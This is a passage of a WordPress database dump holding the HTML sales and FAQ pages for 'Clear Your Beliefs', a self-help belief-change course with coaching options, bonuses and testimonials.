href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7.jpg"><img class=" wp-image-265 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/sess7-300x187.jpg" alt="sess7" width="214" height="134" /></a>In this final session, you’ll examine any remaining issues or challenges in your life, and learn how to use the <strong><em>BeliefCloset Process</em></strong> to eliminate them, one belief at a time.\r\n\r\nYou’ll learn additional techniques for eliminating uncomfortable sensations and feelings, and open opportunities to experience the miracles of life.\r\n\r\nWhen you know that your feelings, perceptions, and circumstances are all created by your beliefs, and when you have a technique for identifying them and eliminating them, you’ll have the power of any Creator – the power to shape the world as you decide, creating a better place for you and those you love.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n<div class="module_body">\r\n\r\n<strong> In Session 7, you will:</strong>\r\n<ul>\r\n	<li>Scan your life for problems and interference, and put them under the <em>BeliefCloset</em> microscope so you can uproot negative core beliefs – where they live</li>\r\n	<li>Learn to use the <em>BeliefCloset Process</em> on your own, anytime, so you can become the Captain of your fate – and your own experience – for the rest of your life</li>\r\n	<li>Find your <strong>True Self</strong> – the creator of your reality – and recognize it as the truth of who you really are</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<!--[wpfcNOT]-->\r\n\r\n&nbsp;\r\n<h1 id="bonus">Support On Your Journey Into Your Subconscious Mind</h1>\r\n<strong>Get Optional Support Sessions with a Professional <em>Clear Your Beliefs</em> Coach.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support.jpg"><img class=" wp-image-318 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/support-300x254.jpg" alt="support" width="182" height="153" /></a>If you choose to add the Coaching Option to your purchase, you’ll be paired with a professional Clear Your Beliefs Coach who will meet with you by phone (or Skype) each week.\r\n\r\nHe or she will offer live, one-on-one support during your belief-clearing journey at a time that''s convenient for you, on a day that fits your schedule.\r\n\r\nOur coaches are located throughout the U.S. and Canada, and 10 countries around the world, including Europe, Australasia, and South Africa. Your <em>Clear Your Beliefs</em> Coach will guide you through any difficult inner terrain you might encounter, and they''ll take you even deeper into your own subconscious mind. They will help you identify and delete difficult-to-locate core beliefs.\r\n\r\nTake advantage of this up-close-and-personal support to help you work through beliefs you uncover during the program. Support sessions are optional, and are provided at an additional cost. Choose the plan that suits you - from the program-only, to full support. Click below for a complete description.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1 id="bonus">You''ll Also Receive the <em>Clear Your Beliefs</em> <em>Bonus Collection</em></h1>\r\nIn addition to these seven transformational sessions, you’ll also receive these awesome bonus interviews and gifts. These two world luminaries will complement your learning and progress during the course, and take your understanding and practice to an even deeper level.\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #1: <strong>Love: What Makes It So Confusing?\r\n<em>Guest Faculty: Carista Luminare, Ph.D.</em></strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg"><img class="wp-image-378 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon1.jpg" alt="bon1" width="168" height="193" /></a>We all want more love in our life, but something keeps getting in the way. We can’t seem to stop hurting each other. What’s going on?\r\n\r\nLion interviews Carista Luminare, Ph.D., author of <em>Parenting Begins Before Conception</em>, President of Luminary Leadership Institute, and co-creator of <em>Confused About Love? </em> and <em>The Power of Love</em> program.<em> </em>(She is also known as <em>Lion''s fiance''</em>)\r\n\r\nCarista shares the latest research on how our early bonding patterns with our parents play out repeatedly in our adult relationships.  We’re confused about what love is, and how to love.  The answers are in our neurology, our earliest programming, and our beliefs about love and how to get it.\r\n\r\nLearn how to determine your own (and your partner’s) LoveStyle, using the <em>LoveStyle Profile Quiz </em>(Bonus # 2). You''ll also get some practical tips for healing old wounds and bringing passion and security back into your relationship.\r\n<strong>\r\nCarista Luminare</strong>, Ph.D., is President of Luminary Leadership Institute. She has 30 years experience as a consultant, counselor and coach to executives, entrepreneurs, and organizations. Her comprehensive, holistic parenting methodology is described in her groundbreaking book, <em>"Parenting Begins Before Conception."</em> In partnership with Lion, she developed LLI’s leading-edge evolutionary leadership program. After graduating from Harvard University in Psychology and Social Relations in 1978, she pioneered educational and therapeutic programs focused on the integration of the personality and soul.\r\n\r\n</div>\r\n</div>\r\n<!-- b2 -->\r\n\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I clearly saw how and why I was doing the things I do. I realized that my difficulties stemmed from my beliefs – especially those I was unaware of. I appreciate the sincerity and integrity of the BeliefCloset Process.”</em>\r\n<div style="text-align: right;"><strong> ~ R. D., Benedictine Priest, San Francisco, CA </strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<!--[wpfcNOT]-->\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #2 <strong>- The LoveStyle Profile Quiz </strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21.jpg"><img class=" wp-image-242 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon21-300x100.jpg" alt="bon2" width="270" height="90" /></a>Take this 5-minute assessment to learn how your childhood bonding patterns impact your adult relationships.  Developed by Carista Luminare and Lion Goodman, you’ll receive a complete ten-page report that introduces you to the 5 LoveStyles, and shows you where you are on each spectrum.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“The BeliefCloset Process has been exceedingly helpful to me on my own internal journey, and it''s a tool I reach for frequently in my psychotherapy practice. It leads to discovery, insight, and change, often with an element of lyricism and poignancy. The explorations are both gentle and profound, and it provides rich material for reflection in the endlessly imaginative outfits that appear in the BeliefCloset. It provides real world results for my clients, and I continue to use, both in my practice and in my own personal growth.”</em>\r\n<div style="text-align: right;"><strong>~ Martha Bear, Psychotherapist, BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #3: <strong> The Spiritual Technology of Manifesting\r\nGuest Faculty: Anodea Judith, Ph.D. </strong></span></div>\r\n<div class="module_body">\r\n\r\n<img class=" wp-image-396 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/bon3.jpg" alt="bon3" width="189" height="169" />Why don''t affirmations and the Law of Attraction work?  You’ll learn why in this interview with internationally acclaimed author and teacher Anodea Judith, one of the world’s leading experts on the Chakras. Her books have sold more than 500,000 copies worldwide.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nLion and Anodea discuss the principles of Manifestation outlined in their book, <em>Creating On Purpose: The Spiritual Technology of Manifesting Through the Chakras.  </em>Beliefs are at the core of the manifestation process, and<em> t</em>heir book is a step-by-step manual for turning any dream into a reality by taking a single idea down through the chakras and into the real world. You’ll receive the first two chapters of the book as Bonus #4, below.\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nAnodea Judith, Ph.D. is the author of <em>Wheels of Life, Eastern Body/Western Mind, Creating On Purpose</em> (with Lion Goodman), and <em>The Global Heart Awakens</em>. She leads workshops on the chakras, psychological development, and spiritual transformation in the U.S. and around the world. Her books are considered classics in their field, and are used by many schools as textbooks for classes on healing and psychological development.\r\n\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>"I uncovered beliefs I didn''t know I had, including: “<i>I''m wretched. There is no God. I am ashamed of myself. I am unworthy of God.”</i> It was an intense process! Each time I deleted an old belief, something shifted at my core. I then replaced each one with a positive belief for my life. That old heavy weight around my heart just lifted off me. I''ve been in awe ever since. You''ve found a powerful way to access the deep subconscious mind!" </em>\r\n<div style="text-align: right;"><strong>~ Maria Garcia, yoga teacher and BeliefCloset Practitioner</strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session"><span class="session">Bonus #4: <strong> Excerpt from the book, "<em>Creating on Purpose: The Spiritual Technology of Manifesting Through the Chakras"</em></strong></span></span></div>\r\n<div class="module_body">\r\n\r\n<strong><em><a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose.jpg"><img class=" wp-image-475 alignleft" style="box-shadow: none!important;" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/creating-on-purpose-294x300.jpg" alt="creating-on-purpose" width="189" height="193" /></a>Creating On Purpose</em></strong> is a step-by-step guide to the manifestation process. In this free sample, you will:\r\n<ul style="padding-left: 20px;">\r\n	<li>Be called to awaken your already-powerful ability to create the life of your dreams</li>\r\n	<li>Learn how the chakras represent two human challenges: <strong>liberation</strong> (from the bottom up) and <strong>manifestation</strong> (from the top down)</li>\r\n	<li>Understand the 7 chakras as stepping stones along the path of the manifestation process</li>\r\n	<li>Gain an understanding of resistance, obstacles, and barriers that come up as you create what you want in life</li>\r\n	<li>Learn a process that can strengthen your power of intention</li>\r\n</ul>\r\n</div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“This valuable tool will enhance your life in ways you cannot imagine. It’s added extraordinary value to my life. I feel calmer overall, and know I have a tool that will enable me to keep growing and expanding.”</em>\r\n<div style="text-align: right;"><strong><strong>~ C.T., Performance and Life Coach</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #5:<strong> Transform Your Beliefs eBook</strong></span></div>\r\n<div class="module_body">\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg"><img class=" wp-image-433 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/TYB-Cover.jpg" alt="TYB Cover" width="159" height="206" /></a>\r\n\r\n</div>\r\n<div class="module_body">\r\n\r\nYou’ll also receive a copy of Lion’s multimedia eBook, “<em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em>.” Lion explains the theory behind <em>The BeliefCloset Process</em>, and offers an explanation for why we do what we do, and why it’s so difficult to change our habitual patterns of thought and behavior. It’s a beautifully produced primer on beliefs – where they come from, how they affect us, and what it takes to change them.\r\n\r\n</div>\r\n<div class="module_body"></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<div class="quot">\r\n\r\n<em>“I now feel empowered to create the life I want, and believe I can accomplish all my goals through shifting my thinking. I am no longer fearful of my limiting beliefs, because now I have a tool to change them.”</em>\r\n<div style="text-align: right;"><strong><strong>– M.M., International Business Consultant</strong></strong></div>\r\n</div>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n\r\n&nbsp;\r\n<div class="module">\r\n<div class="mod_h bbb"><span class="session">Bonus #6: <strong>Complete Transcripts of the Course</strong></span></div>\r\n<div class="module_body">\r\n\r\nYou''ll receive a <strong>complete set of downloadable PDF transcripts</strong> from the course, so you can refer to the material anytime in written form. This includes all 7 classes, plus two bonus interviews!\r\n\r\n</div>\r\n</div>\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<div class="icon_box">\r\n<h1>Register Today And You’ll Receive:</h1>\r\n<strong>Seven 90-Minute Class Sessions with Lion Goodman</strong> – This is a rare opportunity to learn from the creator of one of the world’s most powerful belief-change technologies from the comfort of your own home. Each class session helps you learn the specific skills to change your beliefs – easily, anytime – with 60 minutes of teaching followed by 30 minutes of Q&amp;A. The audio recordings are available for you to listen online, or you can download them in high-quality MP3 format and listen to them anytime and anywhere on your audio player.\r\n\r\n<strong>Nine PDF Transcripts – </strong>In addition to the high quality MP3 audios, you’ll also receive the entire class transcribed word-for-word in PDF format. This includes seven classes plus two bonus calls. You can review, print and highlight the most important insights and practices.\r\n<h1>Plus: <em>The Entire BONUS Collection:</em></h1>\r\n<ul>\r\n	<li><strong><em>What Makes Love So Confusing?</em> </strong>– Audio interview featuring Carista Luminare, Ph.D.</li>\r\n	<li><em>T<strong>he Spiritual Technology of Manifesting</strong></em> – Audio interview featuring Anodea Judith, Ph.D.</li>\r\n	<li>Your Childhood Bonding Pattern Assessment: <strong><em>The LoveStyle Profile Quiz</em></strong></li>\r\n	<li><strong><em>Creating On Purpose: The Spiritual Technology of Manifesting through the Chakras </em></strong> – The first 2 chapters from the book by Lion Goodman and Anodea Judith (PDF)</li>\r\n	<li>Multimedia eBook: <strong><em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World</em></strong> by Lion Goodman (PDF)</li>\r\n</ul>\r\n&nbsp;\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Take This Opportunity For Deep Learning And Transformation</h1>\r\nThis is an opportunity to learn <em>and practice</em> shifting your life – from the core of your psyche. You’ll have a direct experience of the power of <em>The BeliefCloset Process</em>, and you''ll see for yourself how easy it is to significantly change your life.\r\n\r\nYou''ll become part of a global community of like-minded and love-hearted people who dive deeply into themselves to transform the world from the inside out.\r\n\r\nYou can take this journey on your own, one recorded session at a time, or you can sign up for support from a <em>Clear Your Beliefs Coach</em>, a trained professional who will accompany you and guide you through the process. Our coaches are highly trained and qualified to help you deal with any issue you have, in any part of your life, regardless of how long it’s been interfering with your success, joy, and freedom.\r\n<h6>[Note that <em>Clear Your Beliefs Coaches</em> are trained to help you change your own beliefs and remove the impact they''ve had on your life. They are not licensed psychotherapists or physicians. If you have a medical or mental health issue, please consult an appropriate professional who specializes in your particular diagnosis.]</h6>\r\nIn addition to being personally guided by Lion Goodman, you’ll save time and money on the cost of attending a workshop or coaching in person. (Fees, travel, meals and accommodations would add up to thousands of dollars). From the comfort of your home, you’ll go through the program at your own pace.\r\n\r\nIf you’re serious about bringing more freedom, success and joy into your life, you owe it to yourself, your loved ones, and our world – to take this one-of-a-kind training. Transform your life by transforming your beliefs!\r\n\r\nIf you’re ready to clear your old beliefs, click the register button below to choose the method best suited to you.\r\n\r\n&nbsp;\r\n<div class="cb">\r\n\r\n<a href="http://clearyourbeliefs.com/products_categories/coaching"><button class="btn first">Select Your Plan</button></a>\r\n<p style="text-align: center;">OR</p>\r\n<a href="http://clearyourbeliefs.com/sign-up-for-the-clear-your-beliefs-newsletter"><button class="btn">Free eBook</button></a>\r\n\r\n</div>\r\n&nbsp;\r\n<h1>Are You A Change Agent? Join the Global Community of BeliefCloset Practitioners</h1>\r\nAfter you complete the course, you’ll be given an opportunity to register for the <strong>BeliefCloset Practitioner Training.</strong>\r\n\r\n<img class=" wp-image-249 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/global1-300x203.jpg" alt="global" width="191" height="129" />In this 10-week course, you’ll learn how to professionally guide others through the BeliefCloset Process.\r\n\r\nJoin our worldwide community of change agents – including therapists, coaches, and healers of all types. We help our clients, friends, and family members transform their lives by clearing their beliefs at the core of the psyche.\r\n\r\n&nbsp;\r\n<h1>About Lion Goodman</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face.jpg"><img class="alignleft wp-image-303 " src="http://clearyourbeliefs.com/wp-content/uploads/2014/02/lion-face-260x300.jpg" alt="lion-face" width="151" height="175" /></a>Lion is C.E.O. of Luminary Leadership Institute, a consulting firm dedicated to bringing leaders of businesses and organizations into alignment with their True Self and their highest virtues.\r\n\r\nHe is the creator of <strong><em>The BeliefCloset Process</em></strong>®, and author of <em>Transform Your Beliefs: Unleash Your Magnificence and Change Your World.</em>\r\n\r\nHe is the co-author, with Anodea Judith, of <em>Creating on Purpose: The Spiritual Technology of Manifesting through the Chakras</em> <em>.</em> With his partner, Carista Luminare, Ph.D., he created a program for couples and singles who want to create a more secure and passionate relationship:<em><strong> Confused About Love? The Keys to Creating a Secure and Passionate Relationship.</strong></em>\r\n\r\nLion has more than 35 years experience in transformational coaching, entrepreneurial business, spiritual practice, and men’s work. He is a co-founder of <em>The Tribe of Men</em>, an initiatory program for men, and served as Director of Men’s Programs for The Shift Network, where he created programs that served more than 20,000 people around the world. He blogs at www.GoodMenProject.com and www.YourTango.com.\r\n\r\n&nbsp;\r\n<h1 class="center">Satisfaction Guaranteed</h1>\r\n<a href="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar.jpg"><img class="size-medium wp-image-702 alignleft" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/15dayguar-300x131.jpg" alt="15dayguar" width="300" height="131" /></a>Your satisfaction is 100% guaranteed! If you don’t absolutely LOVE the Clear Your Beliefs program, led by Lion Goodman, and you don''t feel that it serves your growth and development, simply let us know within 15 days of your purchase, and we’ll happily issue you a full refund. And just for trying it out, you can keep the bonuses as our gift to you. (Refund policy applies only to the recorded program and unused coaching hours.)\r\n\r\n&nbsp;\r\n<div class="s20"></div>\r\n<h1 id="faq">Frequently Asked Questions</h1>\r\n&nbsp;\r\n\r\n<strong>Q: What is a virtual course?</strong>\r\n\r\nA: It’s a great way to engage with professional teachers from the comfort of your own home. All you need is a computer and an mp3 audio player. If you choose the option of working with a Clear Your Beliefs coach, you’ll work by phone or Skype at a time that’s most convenient to you.\r\n\r\nIn addition to excellent guidance and feedback, you can ask questions and deepen your exploration of the course themes. Note that you will be calling your coach for your support sessions, and your telephone service provider will charge you according to your existing long-distance calling plan. You can use Skype or Google Voice to call your coach.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How long will I have access to the course?</strong>\r\n\r\nA: You can download the course recordings, transcripts, and bonus materials from our online media archive to your own computer, so you’ll have copies permanently. Your Passcode, issued upon purchase, will allow you access to the material on the site for one year from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: Are there scholarships available?</strong>\r\n\r\nA: We offer a limited number of partial scholarships each year, giving preference to veterans, to those in developing countries, and to those who are doing important but underpaid work. If you would like to apply for a scholarship, please send a written request to info@clearyourbeliefs.com, with a description of your circumstances and your offer of what you can pay.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your refund policy?</strong>\r\n\r\nA: Your satisfaction with this course is our highest priority! If you find within 15 days of purchase that the course is not meeting your needs, or the process is simply not working for you, please send a description of your concern to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. If we cannot address your concerns and make it work for you, we offer a full refund (minus any used coaching time) so you can try out the course risk-free. No refunds are available after 15 days from your date of purchase.\r\n\r\n&nbsp;\r\n\r\n<strong> Q: How can I reach Customer Support?</strong>\r\n\r\nA: Please send an email to <a href="mailto:support@clearyourbeliefs.com">support@clearyourbeliefs.com</a>. We’ll get back to you within 48 hours (sometimes longer over weekends).\r\n\r\n&nbsp;\r\n\r\n<strong> Q: What is your Privacy Policy?</strong>\r\n\r\nA: We take your privacy very seriously. Your name and email are never shared with any other organization or person. We add your name and email to our customer database, and periodically send you newsletters and announcements with information about our programs and products. Our mailing list includes a number of brands, so you may see emails from ClearYourBeliefs.com, BeliefCloset.com, or ConfusedAboutLove.com.\r\n\r\nYou may unsubscribe anytime you wish. Unsubscribing will opt you out of all of our communications, so you will not hear about our other opportunities or our curriculum.\r\n\r\nAll information that you provide to your <em>Clear Your Beliefs Coach</em> will be held in strictest confidence, and will never be shared with anyone, with one exception: your Coach may communicate and consult with Lion Goodman for his support and for quality control purposes. He holds all personal information in the strictest of confidence, as well.', 'Clear Your Beliefs', '', 'inherit', 'closed', 'open', '', '915-revision-v1', '', '', '2014-06-17 20:10:16', '2014-06-18 01:10:16', '', 915, 'http://clearyourbeliefs.com/915-revision-v1', 0, 'revision', '', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(985, 2, '2014-06-17 20:37:31', '2014-06-18 01:37:31', '', 'ReportsLanding', '', 'inherit', 'closed', 'open', '', 'reportslanding', '', '', '2014-06-17 20:37:31', '2014-06-18 01:37:31', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/ReportsLanding.jpg', 0, 'attachment', 'image/jpeg', 0),
(986, 2, '2014-06-17 20:37:33', '2014-06-18 01:37:33', '', 'High pile of hardcover books', '', 'inherit', 'closed', 'open', '', 'high-pile-of-hardcover-books', '', '', '2014-06-17 20:37:33', '2014-06-18 01:37:33', '', 915, 'http://clearyourbeliefs.com/wp-content/uploads/2014/06/report-stack_1.jpg', 0, 'attachment', 'image/jpeg', 0);
INSERT INTO `cyb_posts` (`ID`, `post_author`, `post_date`, `post_date_gmt`, `post_content`, `post_title`, `post_excerpt`, `post_status`, `comment_status`, `ping_status`, `post_password`, `post_name`, `to_ping`, `pinged`, `post_modified`, `post_modified_gmt`, `post_content_filtered`, `post_parent`, `guid`, `menu_order`, `post_type`, `post_mime_type`, `comment_count`) VALUES
(988, 2, '2014-06-17 20:40:38', '2014-06-18 01:40:38', '<div style="width: 115%; margin-left: -40px;">\r\n\r\n<img class="hdr-img alignleft wp-image-300" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/header-img2.jpg" alt="header-img" width="160" height="147" />\r\n<h5 class="hdr rt"><strong>Delete Blocks &amp; Limitations</strong></h5>\r\n<img class="wp-image-302 alignright tophdr" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/joy1-300x282.jpg" alt="joy" width="160" height="150" />\r\n<h5 class="hdr lt"><strong>Allow More Success &amp; Joy</strong></h5>\r\n<img class="tophdr alignleft wp-image-316" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/simply-300x300.jpg" alt="simply" width="159" height="159" />\r\n<h5 class="hdr rt"><strong>Simply CLEAR Your Beliefs!</strong></h5>\r\n</div>\r\n<div class="quot" style="float: left; margin-top: 0px; text-align: center;"><img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" />\r\n<span style="color: #ff0000;"><strong>Your "limitations" are created by your beliefs.\r\nWhen you learn to change your beliefs, limitations disappear,\r\nand possibilities become unlimited.</strong></span>\r\n<img class="no-shad aligncenter wp-image-747 size-medium" src="http://clearyourbeliefs.com/wp-content/uploads/2014/06/line-300x14.png" alt="line" width="300" height="14" /></div>\r\n&nbsp;\r\n<h1>Why Aren''t You Living the Life Of Your Dreams Right Now?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift.jpg"><img class="wp-image-315 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/shift-300x300.jpg" alt="shift" width="155" height="155" /></a> You’re seeking a better life, and you’ve been on the path of personal growth for some time. You''ve tried many teachers and methods. You’ve had some breakthrough experiences and epiphanies. You’ve made progress toward your goals.\r\n\r\nYet you continue to fall back into old habits and patterns. In some ways, life remains a struggle against your own internal blocks and resistance, preventing you from moving forward with ease and grace.\r\n\r\n&nbsp;\r\n<h1>What If You Could Permanently Delete Old Habits And Patterns So They <em>Didn''t</em> Come Back?</h1>\r\nHundreds of teachers and organizations offer the next miracle cure for what they believe ails you. They promise to improve some area of your life or business, yet their “fixes” tend to wear off over time. After taking their program, you’re revved up, transformed, and ready to go.\r\n\r\n<strong>Two weeks later,</strong> you’re mostly doing the same things as before. Your issues have returned to haunt you. Nothing significant has changed. You''re still not taking consistent actions to reach your goals or change your life.\r\n\r\n&nbsp;\r\n<h1>Why Does This Happen?</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2.jpg"><img class=" wp-image-299 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/brain2-300x300.jpg" alt="brain" width="153" height="153" /></a>Have you heard the myth, <em>"It takes 30 days to change a habit?"</em> <strong>It''s not true.</strong> Research shows that some simple habits can be changed in only 30 days, but to make significant life changes, it takes <span style="text-decoration: underline;">much</span> more time and practice.\r\n\r\nNeuroscientists call the brain’s ability to change over time "neuroplasticity."\r\n\r\nIt can take months – or <em>years</em> – of hard work to shift old patterns of behavior. Eventually, new habits will replace the old ones. But that requires consistent, steady efforts – and <strong>most people give up long before that happens.</strong>\r\n\r\n&nbsp;\r\n<h1>To Make Real Change, You Have To Get To The Root of Things</h1>\r\n<span style="color: #000000;">The best doctors seek the <em>source</em> the <em>source</em> of the dis-ease. They don''t just prescribe drugs to treat your symptoms. Drugs like that make you feel a little better for awhile, but they don''t solve the <em>cause</em> of the problem – where the illness is being generated.<img class=" wp-image-324 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/weedjpg-300x199.jpg" alt="weedjpg-300x199" width="184" height="122" /></span>\r\n\r\nIf you don''t pull weeds up by the roots, they just grow back – again and again. So what, then, is at the root of the habits and patterns in your life that cause you so much unhappiness?\r\n\r\n&nbsp;\r\n<h1>Beliefs Are The Foundation Of Your Experience</h1>\r\nYour psychological, emotional, and spiritual dis-ease are caused primarily by your <em>beliefs.</em> We usually think of beliefs as consciously held convictions, but our strongest and most deeply held beliefs are unconscious. They operate <em>through us</em>, and they are at the root of all the habits and patterns in our life. But we''re only dimly aware of them, or not aware of them at all. <strong>Yet beliefs are at the core of every experience, decision, and pattern in our lives.</strong>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg"><img class=" wp-image-320 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/construction-300x224.jpg" alt="construction-300x224" width="158" height="118" /></a><span style="color: #000080;">Beliefs can be seen as the literal<em> foundation</em> of consciousness, upon which our thoughts, feelings, and attitudes are built.</span>\r\n\r\n<span style="color: #000000;"><strong>We literally <span style="text-decoration: underline;">create our reality</span> with our beliefs.</strong></span>\r\n\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg"><img class=" wp-image-321 alignright" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/04/dilap.jpg" alt="dilap" width="157" height="114" /></a>If you build a house on a shaky ground, it doesn’t matter how much redecorating you do. It will buckle, and eventually fall. You can fervently practice meditation, visualization, or business building skills, but if there are sneaky saboteurs in the basement of your mind, pulling the foundation out from under you, you won''t be able to achieve permanent success.\r\n\r\n&nbsp;\r\n<h1>Upgrade Your Human Operating System</h1>\r\n<a href="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open.jpg"><img class=" wp-image-328 alignleft" src="http://beliefcloset.com/cyb/wp-content/uploads/2014/02/brain-open-254x300.jpg" alt="brain-open" width="123" height="146" /></a> Your brain/mind is more sophisticated than the fastest supercomputer. Like a computer, you have an underlying Operating System. If your O.S. has faulty programming, havoc results – especially when you try to run a sophisticated application – <em>like managing your life</em>.\r\n\r\nNegative beliefs operate like a badly programmed operating system, messing up everything else, and preventing you from doing what you came here to do. <strong>Do you ever have thoughts like these?</strong>\r\n<div class="icon_box bullets">\r\n<ul class="two-col">\r\n	<li><strong><em>I''m not enough.</em></strong></li>\r\n	<li><strong><em>I can''t do it.</em></strong></li>\r\n	<li><strong><em>I''m not worthy.</em></strong></li>\r\n	<li><strong><strong><em>I''ll never be like them.</em></strong></strong></li>\r\n	<li><strong><em>I''m all alone.</em></strong></li>\r\n</ul>\r\n<ul class="two-col rt">\r\n	<li><strong><em>I need to do more (or better) to be accepted.</em></strong></li>\r\n	<li><strong><em>There''s something wrong with me.</em></strong></li>\r\n	<li><strong><em>I''m fundamentally flawed.</em></strong></li>\r\n	<li><strong><em><strong><em>Nobody wants what I have to offer.</em></strong></em></strong></li>\r\n	<li><strong><em><strong><em>If I speak up, something bad will happen.</em></strong></em></strong></li>\r\n</ul>\r\n</div>\r\nThese beliefs may appear as inner voices that criticize or diminish you. They can cause depression, self-loathing, over-achieving, self-sacrifice, or other negative conditions.\r\n\r\nAt the core of every bad feeling you have about yourself, and every limitation you have, there''s a belief operating in the background, like an annoying little machine that you can''t turn off.\r\n\r\n<strong>Here''s the good news:</strong> <strong><span style="color: 